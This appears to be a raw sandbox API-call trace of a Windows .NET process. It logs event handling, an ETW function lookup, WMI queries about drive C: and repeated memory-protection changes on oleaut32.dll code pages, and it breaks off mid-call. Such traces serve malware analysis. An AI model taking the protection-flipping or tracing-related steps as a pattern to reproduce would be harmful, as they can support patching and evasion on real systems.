SetEvent (hEvent=0xbc) returned 1 [0102.204] SetEvent (hEvent=0xb8) returned 1 [0102.204] CloseHandle (hObject=0x440) returned 1 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] ResetEvent (hEvent=0xb8) returned 1 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] ResetEvent (hEvent=0xb8) returned 1 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] GetCurrentThreadId () returned 0xba4 [0102.206] SetEvent (hEvent=0xbc) returned 1 [0102.206] SetEvent (hEvent=0xb8) returned 1 [0102.206] CloseHandle (hObject=0x440) returned 1 [0107.774] GetCurrentThreadId () returned 0xba4 [0107.774] ResetEvent (hEvent=0xb8) returned 1 [0107.774] GetCurrentThreadId () returned 0xba4 [0107.774] GetCurrentThreadId () returned 0xba4 [0107.774] GetCurrentThreadId () returned 0xba4 [0107.774] GetCurrentThreadId () returned 0xba4 [0107.775] ResetEvent (hEvent=0xb8) returned 1 [0107.775] GetCurrentThreadId () returned 0xba4 [0107.775] GetCurrentThreadId () returned 0xba4 [0107.775] SetEvent (hEvent=0xbc) returned 1 [0107.775] SetEvent (hEvent=0xb8) returned 1 [0107.775] CloseHandle (hObject=0x444) returned 1 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] ResetEvent (hEvent=0xb8) returned 1 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] ResetEvent (hEvent=0xb8) returned 1 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] GetCurrentThreadId () returned 0xba4 [0107.779] SetEvent (hEvent=0xbc) returned 1 [0107.779] SetEvent (hEvent=0xb8) returned 1 [0107.779] CloseHandle (hObject=0x444) returned 1 [0108.479] SysReAllocStringLen (in: pbstr=0x41d390*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41d390*="ntdll.dll") returned 1 [0108.479] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0108.480] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0108.481] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c7f843 [0108.489] SysReAllocStringLen (in: pbstr=0x41e720*=0x0, psz="Kernel32", len=0x8 | out: pbstr=0x41e720*="Kernel32") returned 1 [0108.489] CharLowerBuffW (in: lpsz="Kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0108.489] GetModuleHandleW (lpModuleName="Kernel32") returned 0x76d30000 [0108.493] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadPreferredUILanguages") returned 0x76dc47a1 [0108.497] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadPreferredUILanguages") returned 0x76dd79e5 [0108.500] GetProcAddress (hModule=0x76d30000, lpProcName="LocaleNameToLCID") returned 0x76dc4801 [0108.504] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0108.516] GetCurrentThreadId () returned 0xba4 [0108.516] ResetEvent (hEvent=0xb8) returned 1 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] ResetEvent (hEvent=0xb8) returned 1 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] GetCurrentThreadId () returned 0xba4 [0108.517] SetEvent (hEvent=0xbc) returned 1 [0108.517] SetEvent (hEvent=0xb8) returned 1 [0108.517] CloseHandle (hObject=0x44c) returned 1 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] ResetEvent (hEvent=0xb8) returned 1 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] ResetEvent (hEvent=0xb8) returned 1 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] GetCurrentThreadId () returned 0xba4 [0108.519] SetEvent (hEvent=0xbc) returned 1 [0108.519] SetEvent (hEvent=0xb8) returned 1 [0108.519] CloseHandle (hObject=0x44c) returned 1 [0108.521] WbemLocator:IUnknown:QueryInterface (in: This=0x672d544, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e8c4 | out: ppvObject=0x41e8c4*=0x76b0c4) returned 0x0 [0108.521] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x76b0c4, pProxy=0x672d544, pAuthnSvc=0x41e914, pAuthzSvc=0x41e910, pServerPrincName=0x41e908, pAuthnLevel=0x41e90c, pImpLevel=0x41e8fc, pAuthInfo=0x41e900, pCapabilites=0x41e904 | out: pAuthnSvc=0x41e914*=0xa, pAuthzSvc=0x41e910*=0x0, pServerPrincName=0x41e908, pAuthnLevel=0x41e90c*=0x6, pImpLevel=0x41e8fc*=0x2, pAuthInfo=0x41e900, pCapabilites=0x41e904*=0x1) returned 0x0 [0108.521] WbemLocator:IUnknown:Release (This=0x76b0c4) returned 0x1 [0108.521] WbemLocator:IUnknown:QueryInterface (in: This=0x672d544, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e8b8 | out: ppvObject=0x41e8b8*=0x76b0e4) returned 0x0 [0108.521] WbemLocator:IUnknown:QueryInterface (in: This=0x672d544, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e8b4 | out: ppvObject=0x41e8b4*=0x76b0c4) returned 0x0 [0108.521] WbemLocator:IClientSecurity:SetBlanket (This=0x76b0c4, pProxy=0x672d544, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.522] WbemLocator:IUnknown:Release (This=0x76b0c4) returned 0x2 [0108.522] WbemLocator:IUnknown:Release (This=0x76b0e4) returned 0x1 [0108.522] CoTaskMemFree (pv=0x758ad8) [0108.522] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x0 [0108.522] WbemLocator:IUnknown:QueryInterface (in: This=0x672d544, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e4b4 | out: ppvObject=0x41e4b4*=0x76b0e4) returned 0x0 [0108.522] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e470 | out: ppvObject=0x41e470*=0x0) returned 0x80004002 [0108.522] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e28c | out: ppvObject=0x41e28c*=0x0) returned 0x80004002 [0108.523] WbemLocator:IUnknown:AddRef (This=0x76b0e4) returned 0x3 [0108.523] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41ddcc | out: ppvObject=0x41ddcc*=0x0) returned 0x80004002 [0108.523] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dd7c | out: ppvObject=0x41dd7c*=0x0) returned 0x80004002 [0108.524] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd88 | out: ppvObject=0x41dd88*=0x76b044) returned 0x0 [0108.524] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x76b044, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd90 | out: pCid=0x41dd90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.524] WbemLocator:IUnknown:Release (This=0x76b044) returned 0x3 [0108.524] CoGetContextToken (in: pToken=0x41dde8 | out: pToken=0x41dde8) returned 0x0 [0108.524] CoGetContextToken (in: pToken=0x41e1f0 | out: pToken=0x41e1f0) returned 0x0 [0108.524] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e280 | out: ppvObject=0x41e280*=0x76b0cc) returned 0x0 [0108.525] WbemLocator:IRpcOptions:Query (in: This=0x76b0cc, pPrx=0x76b0e4, dwProperty=2, pdwValue=0x41e2a8 | out: pdwValue=0x41e2a8) returned 0x80004002 [0108.525] WbemLocator:IUnknown:Release (This=0x76b0cc) returned 0x3 [0108.525] WbemLocator:IUnknown:Release (This=0x76b0e4) returned 0x2 [0108.525] CoGetContextToken (in: pToken=0x41e7c8 | out: pToken=0x41e7c8) returned 0x0 [0108.525] CoGetContextToken (in: pToken=0x41e728 | out: pToken=0x41e728) returned 0x0 [0108.525] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x41e7f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x41e7f4 | out: ppvObject=0x41e7f4*=0x672d544) returned 0x0 [0108.525] WbemLocator:IUnknown:AddRef (This=0x672d544) returned 0x4 [0108.525] WbemLocator:IUnknown:Release (This=0x672d544) returned 0x3 [0108.525] WbemLocator:IUnknown:Release (This=0x672d544) returned 0x2 [0108.528] SysReAllocStringLen (in: pbstr=0x41df0c*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x41df0c*="oleaut32.dll") returned 1 [0108.528] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0108.529] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0108.529] GetLastError () returned 0x7e [0108.529] SetLastError (dwErrCode=0x7e) [0108.534] SysReAllocStringLen (in: pbstr=0x41df0c*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x41df0c*="oleaut32.dll") returned 1 [0108.534] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0108.535] LoadLibraryExW (lpLibFileName="oleaut32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0108.535] GetLastError () returned 0x0 [0108.535] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41238, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.536] GetCurrentProcess () returned 0xffffffff [0108.536] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41238, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.536] GetCurrentProcess () returned 0xffffffff [0108.536] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41258, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.536] GetCurrentProcess () returned 0xffffffff [0108.536] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41258, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.537] GetCurrentProcess () returned 0xffffffff [0108.537] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41260, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.537] GetCurrentProcess () returned 0xffffffff [0108.537] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41260, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.538] GetCurrentProcess () returned 0xffffffff [0108.538] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41268, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.538] GetCurrentProcess () returned 0xffffffff [0108.538] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41268, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.538] GetCurrentProcess () returned 0xffffffff [0108.538] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e412c4, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.539] GetCurrentProcess () returned 0xffffffff [0108.539] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e412c4, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.539] GetCurrentProcess () returned 0xffffffff [0108.539] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e412cc, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.540] GetCurrentProcess () returned 0xffffffff [0108.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e412cc, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.540] GetCurrentProcess () returned 0xffffffff [0108.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41300, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.540] GetCurrentProcess () returned 0xffffffff [0108.540] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41300, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.541] GetCurrentProcess () returned 0xffffffff [0108.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41308, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.541] GetCurrentProcess () returned 0xffffffff [0108.541] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41308, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.542] GetCurrentProcess () returned 0xffffffff [0108.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e4132c, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.542] GetCurrentProcess () returned 0xffffffff [0108.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e4132c, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.542] GetCurrentProcess () returned 0xffffffff [0108.542] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41390, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x4, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x20) returned 0x0 [0108.543] GetCurrentProcess () returned 0xffffffff [0108.543] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41def4*=0x76e41390, NumberOfBytesToProtect=0x41def8, NewAccessProtection=0x20, OldAccessProtection=0x41df2c | out: BaseAddress=0x41def4*=0x76e41000, NumberOfBytesToProtect=0x41def8, OldAccessProtection=0x41df2c*=0x4) returned 0x0 [0108.544] GetProcAddress (hModule=0x76e40000, lpProcName="SysStringLen") returned 0x76e44680 [0108.544] SysStringLen (param_1=0x0) returned 0x0 [0108.547] GetProcAddress (hModule=0x76d30000, lpProcName="RtlZeroMemory") returned 0x77ca3c10 [0108.548] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720820, puCount=0x41eb8c | out: puCount=0x41eb8c*=0x0) returned 0x0 [0108.548] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb88*=0x0, pszText=0x0 | out: puBuffLength=0x41eb88*=0x20, pszText=0x0) returned 0x0 [0108.548] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x41eb88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0108.548] CoGetContextToken (in: pToken=0x41e7f8 | out: pToken=0x41e7f8) returned 0x0 [0108.548] WbemLocator:IUnknown:AddRef (This=0x76b0e4) returned 0x3 [0108.549] WbemLocator:IUnknown:QueryInterface (in: This=0x76b0e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e68c | out: ppvObject=0x41e68c*=0x76b0e4) returned 0x0 [0108.549] WbemLocator:IUnknown:Release (This=0x76b0e4) returned 0x3 [0108.549] WbemLocator:IUnknown:Release (This=0x76b0e4) returned 0x2 [0108.549] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb90*=0x0, pszText=0x0 | out: puBuffLength=0x41eb90*=0x20, pszText=0x0) returned 0x0 [0108.549] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb90*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x41eb90*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0108.563] IWbemServices:GetObject (in: This=0x672d544, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x41eb44*=0x0, ppCallResult=0x0 | out: ppObject=0x41eb44*=0x672efb0, ppCallResult=0x0) returned 0x0 [0108.563] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d4e4, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll희Aọ矋ퟀA픤A矆핌A픨A矆ޠ") returned 12 [0108.563] SysReAllocStringLen (in: pbstr=0x41e4e8*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x41e4e8*="OLEAUT32.dll") returned 1 [0108.563] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0108.564] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0108.564] GetLastError () returned 0x0 [0108.564] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41238, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.565] GetCurrentProcess () returned 0xffffffff [0108.565] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41238, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.565] GetCurrentProcess () returned 0xffffffff [0108.565] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41258, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.565] GetCurrentProcess () returned 0xffffffff [0108.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41258, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.566] GetCurrentProcess () returned 0xffffffff [0108.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41260, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.566] GetCurrentProcess () returned 0xffffffff [0108.566] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41260, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.567] GetCurrentProcess () returned 0xffffffff [0108.567] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41268, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.567] GetCurrentProcess () returned 0xffffffff [0108.567] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41268, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.567] GetCurrentProcess () returned 0xffffffff [0108.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e412c4, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.568] GetCurrentProcess () returned 0xffffffff [0108.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e412c4, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.568] GetCurrentProcess () returned 0xffffffff [0108.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e412cc, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.569] GetCurrentProcess () returned 0xffffffff [0108.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e412cc, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.569] GetCurrentProcess () returned 0xffffffff [0108.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41300, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.570] GetCurrentProcess () returned 0xffffffff [0108.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41300, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.570] GetCurrentProcess () returned 0xffffffff [0108.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41308, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, 